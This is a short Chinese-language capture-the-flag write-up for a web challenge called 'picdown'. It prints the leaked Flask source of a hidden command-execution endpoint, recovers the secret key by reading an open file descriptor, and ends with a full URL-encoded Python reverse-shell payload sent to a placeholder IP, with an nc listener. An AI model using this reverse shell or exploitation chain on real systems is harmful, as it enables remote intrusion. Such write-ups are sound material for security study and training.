picdown
抓包發現存在文件包含漏洞:
在main.py下面暴露的flask的源代碼
from flask import Flask, Response, render_template, request import os import urllib app = Flask(__name__) SECRET_FILE = "/tmp/secret.txt" f = open(SECRET_FILE, 'r') SECRET_KEY = f.read().strip() os.remove(SECRET_FILE) @app.route('/') def index(): return render_template('search.html') @app.route('/page') def page(): url = request.args.get("url") try: if not url.lower().startswith("file"): res = urllib.urlopen(url) value = res.read() response = Response(value, mimetype='application/octet-stream') response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg' return response else: value = "HACK ERROR!" except Exception as e: print(e) value = "SOMETHING WRONG!" return render_template('search.html', res=value) @app.route('/no_one_know_the_manager') def manager(): key = request.args.get("key") print(SECRET_KEY) if key == SECRET_KEY: shell = request.args.get("shell") os.system(shell) res = "ok" else: res = "Wrong Key!" return res if __name__ == '__main__': app.run(host='0.0.0.0', port=80, use_reloader=False)
代碼審計發現,no_one_know_the_manager頁面下接收key和shell,key要求和secret_key一樣。
但是secret.txt讀不了
但是這個文件是用open打開的,會創建文件描述符。我們讀這個文件描述符中的內容就好了
找到了key=2e3658a3c99be231c2b3b0cc260528c4
現在可以執行系統命令了
但是不會回顯,要反彈shell了。
python腳本反彈shell
/no_one_know_the_manager?key=2e3658a3c99be231c2b3b0cc260528c4&shell=python%20-c%20%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22xx.xx.xx.xx%22,8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
服務器:nc -lvvp 8080
可以成功反彈shell,最終在/root/flag.txt中得到flag:
其他web題目,ctf平台沒有上環境...
待續....